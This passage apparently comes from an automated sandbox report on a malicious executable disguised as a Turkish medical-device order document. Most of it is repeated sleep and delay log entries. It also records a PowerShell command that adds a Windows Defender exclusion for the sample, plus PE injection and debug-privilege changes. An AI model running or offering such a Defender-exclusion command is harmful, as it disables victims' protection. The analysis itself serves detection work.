                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595488s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -595219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594494s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594282s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594157s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -594032s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -593922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -593812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -593703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -593594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239875Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239766Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239657Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239532Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239407Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239292Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239188Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239063Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238938Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238813Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238688Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238578Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238469Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238219Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238083Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237956Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599828Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599719Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595488Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594494Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594282Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594157Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594032Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593594Jump to behavior
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780842642.0000000000F96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory written: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002FB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002FB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000003418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerP
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000003418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000003418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager|
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
